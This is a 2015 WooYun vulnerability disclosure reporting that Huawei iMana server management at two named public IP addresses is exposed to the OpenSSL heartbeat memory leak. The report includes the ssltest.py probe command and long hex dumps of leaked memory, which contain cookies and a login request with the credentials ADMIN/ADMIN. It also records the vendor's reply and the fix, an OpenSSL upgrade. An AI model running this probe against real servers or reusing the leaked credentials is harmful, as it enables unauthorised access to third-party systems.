当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0106564

漏洞标题:华为服务器远程管理iMana存在信息泄露漏洞

相关厂商:华为技术有限公司

漏洞作者: 路人甲

提交时间:2015-04-09 18:26

修复时间:2015-05-29 10:58

公开时间:2015-05-29 10:58

漏洞类型:重要敏感信息泄露

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-09: 细节已通知厂商并且等待厂商处理中
2015-04-14: 厂商已经确认,细节仅向厂商公开
2015-04-24: 细节向核心白帽子及相关领域专家公开
2015-05-04: 细节向普通白帽子公开
2015-05-14: 细节向实习白帽子公开
2015-05-29: 细节向公众公开

简要描述:

华为服务器远程管理 iMana存在信息泄露漏洞

详细说明:

华为服务器远程管理 iMana 存在openssl漏洞。
测试(一)101.226.247.236

ssltest.py 101.226.247.236|more
Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 58
 ... received message: type = 22, ver = 0302, length = 1961
 ... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
 ... received message: type = 24, ver = 0302, length = 12307
Received heartbeat response:
  0000: 02 30 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C  .0....SC[...r...
  0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90  .+..H...9.......
  0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0  .w.3....f.....".
  0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00  !.9.8.........5.
  0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0  ................
  0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00  ............3.2.
  0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00  ....E.D...../...
  0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00  A...............
  0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01  ................
  0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00  ..I...........4.
  00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00  2...............
  00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00  ................
  00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00  ................
  00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 74 3A 20 4D  ....#.......t: M
  00e0: 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64  ozilla/5.0 (Wind
  00f0: 6F 77 73 20 4E 54 20 36 2E 31 29 20 41 70 70 6C  ows NT 6.1) Appl
  0100: 65 57 65 62 4B 69 74 2F 35 33 37 2E 33 36 20 28  eWebKit/537.36 (
  0110: 4B 48 54 4D 4C 2C 20 6C 69 6B 65 20 47 65 63 6B  KHTML, like Geck
  0120: 6F 29 20 43 68 72 6F 6D 65 2F 34 31 2E 30 2E 32  o) Chrome/41.0.2
  0130: 32 37 32 2E 31 31 38 20 53 61 66 61 72 69 2F 35  272.118 Safari/5
  0140: 33 37 2E 33 36 0D 0A 52 65 66 65 72 65 72 3A 20  37.36..Referer:
  0150: 68 74 74 70 73 3A 2F 2F 31 30 31 2E 32 32 36 2E  https://101.226.
  0160: 32 34 37 2E 32 33 36 2F 6C 6F 67 69 6E 2E 61 73  247.236/login.as
  0170: 70 3F 6C 61 6E 67 3D 63 6E 26 6F 70 65 72 61 74  p?lang=cn&operat
  0180: 65 3D 66 61 69 6C 0D 0A 41 63 63 65 70 74 2D 45  e=fail..Accept-E
  0190: 6E 63 6F 64 69 6E 67 3A 20 67 7A 69 70 2C 20 64  ncoding: gzip, d
  01a0: 65 66 6C 61 74 65 2C 20 73 64 63 68 0D 0A 41 63  eflate, sdch..Ac
  01b0: 63 65 70 74 2D 4C 61 6E 67 75 61 67 65 3A 20 7A  cept-Language: z
  01c0: 68 2D 43 4E 2C 7A 68 3B 71 3D 30 2E 38 0D 0A 43  h-CN,zh;q=0.8..C
  01d0: 6F 6F 6B 69 65 3A 20 69 73 53 75 70 70 6F 72 74  ookie: isSupport
  01e0: 43 6F 6F 6B 69 65 3D 48 75 61 77 65 69 2D 48 52  Cookie=Huawei-HR
  01f0: 4D 43 0D 0A 0D 0A 6C B3 2F 11 EB A3 0B A8 A0 66  MC....l./......f
  0200: 2E FE 79 22 E0 75 6E 67 75 61 67 65 3A 20 7A 68  ..y".unguage: zh
  0210: 2D 43 4E 2C 7A 68 3B 71 3D 30 2E 38 0D 0A 43 6F  -CN,zh;q=0.8..Co
  0220: 6F 6B 69 65 3A 20 69 73 53 75 70 70 6F 72 74 43  okie: isSupportC
  0230: 6F 6F 6B 69 65 3D 48 75 61 77 65 69 2D 48 52 4D  ookie=Huawei-HRM
  0240: 43 3B 20 69 73 53 75 70 70 6F 72 74 43 6F 6F 6B  C; isSupportCook
  0250: 69 65 3D 48 75 61 77 65 69 2D 48 52 4D 43 0D 0A  ie=Huawei-HRMC..
  0260: 0D 0A 6C 61 6E 67 3D 63 6E 26 55 73 65 72 4E 61  ..lang=cn&UserNa
  0270: 6D 65 3D 41 44 4D 49 4E 26 50 61 73 73 77 6F 72  me=ADMIN&Passwor
  0280: 64 3D 41 44 4D 49 4E 26 61 75 74 68 65 6E 74 69  d=ADMIN&authenti
  0290: 63 61 74 65 54 79 70 65 3D 30 26 64 6F 6D 61 69  cateType=0&domai
  02a0: 6E 3D 30 90 BA A6 22 8F 30 F4 F0 EF D1 77 6E 2B  n=0...".0....wn+
  02b0: 11 E8 58 C0 AA C0 AB C0 AC C0 AD C0 AE C0 AF 01  ..X.............


测试(二)101.226.247.237

Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 58
 ... received message: type = 22, ver = 0302, length = 1961
 ... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
 ... received message: type = 24, ver = 0302, length = 12307
Received heartbeat response:
  0000: 02 30 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C  .0....SC[...r...
  0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90  .+..H...9.......
  0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0  .w.3....f.....".
  0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00  !.9.8.........5.
  0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0  ................
  0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00  ............3.2.
  0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00  ....E.D...../...
  0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00  A...............
  0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01  ................
  0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00  ..I...........4.
  00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00  2...............
  00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00  ................
  00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00  ................
  00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 74 3A 20 4D  ....#.......t: M
  00e0: 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64  ozilla/5.0 (Wind
  00f0: 6F 77 73 20 4E 54 20 36 2E 31 29 20 41 70 70 6C  ows NT 6.1) Appl
  0100: 65 57 65 62 4B 69 74 2F 35 33 37 2E 33 36 20 28  eWebKit/537.36 (
  0110: 4B 48 54 4D 4C 2C 20 6C 69 6B 65 20 47 65 63 6B  KHTML, like Geck
  0120: 6F 29 20 43 68 72 6F 6D 65 2F 34 31 2E 30 2E 32  o) Chrome/41.0.2
  0130: 32 37 32 2E 31 31 38 20 53 61 66 61 72 69 2F 35  272.118 Safari/5
  0140: 33 37 2E 33 36 0D 0A 52 65 66 65 72 65 72 3A 20  37.36..Referer:
  0150: 68 74 74 70 73 3A 2F 2F 31 30 31 2E 32 32 36 2E  https://101.226.
  0160: 32 34 37 2E 32 33 37 2F 6C 6F 67 69 6E 2E 61 73  247.237/login.as
  0170: 70 0D 0A 41 63 63 65 70 74 2D 45 6E 63 6F 64 69  p..Accept-Encodi
  0180: 6E 67 3A 20 67 7A 69 70 2C 20 64 65 66 6C 61 74  ng: gzip, deflat
  0190: 65 2C 20 73 64 63 68 0D 0A 41 63 63 65 70 74 2D  e, sdch..Accept-
  01a0: 4C 61 6E 67 75 61 67 65 3A 20 7A 68 2D 43 4E 2C  Language: zh-CN,
  01b0: 7A 68 3B 71 3D 30 2E 38 0D 0A 43 6F 6F 6B 69 65  zh;q=0.8..Cookie
  01c0: 3A 20 69 73 53 75 70 70 6F 72 74 43 6F 6F 6B 69  : isSupportCooki
  01d0: 65 3D 48 75 61 77 65 69 2D 48 52 4D 43 0D 0A 0D  e=Huawei-HRMC...
  01e0: 0A 88 8D 97 69 88 18 D6 E6 EE 4B F8 C1 6C A7 E7  ....i.....K..l..
  01f0: AE 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0200: 68 3B 71 3D 30 2E 38 0D 0A 43 6F 6F 6B 69 65 3A  h;q=0.8..Cookie:
  0210: 20 69 73 53 75 70 70 6F 72 74 43 6F 6F 6B 69 65   isSupportCookie
  0220: 3D 48 75 61 77 65 69 2D 48 52 4D 43 3B 20 69 73  =Huawei-HRMC; is
  0230: 53 75 70 70 6F 72 74 43 6F 6F 6B 69 65 3D 48 75  SupportCookie=Hu
  0240: 61 77 65 69 2D 48 52 4D 43 0D 0A 0D 0A 6C 61 6E  awei-HRMC....lan
  0250: 67 3D 63 6E 26 55 73 65 72 4E 61 6D 65 3D 41 44  g=cn&UserName=AD
  0260: 4D 49 4E 26 50 61 73 73 77 6F 72 64 3D 41 44 4D  MIN&Password=ADM
  0270: 49 4E 26 61 75 74 68 65 6E 74 69 63 61 74 65 54  IN&authenticateT
  0280: 79 70 65 3D 30 26 64 6F 6D 61 69 6E 3D 30 FC 75  ype=0&domain=0.u
  0290: C9 63 64 47 0D CA 14 F2 62 A4 DD 72 99 E4 9F C0  .cdG....b..r....
  02a0: A0 C0 A1 C0 A2 C0 A3 C0 A4 C0 A5 C0 A6 C0 A7 C0  ................
-- More  --

漏洞证明:

https://101.226.247.236/login.asp
https://101.226.247.237/login.asp

修复方案:

升级openssl

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-04-14 10:56

厂商回复:

感谢提醒

最新状态:

2015-04-14:感谢白帽子对华为产品安全性的关注,华为已于2014年5月修复了该漏洞,并在华为PSIRT网站发布了SA。报告中被利用的服务器使用的历史版本,我们已经知会客户进行处理。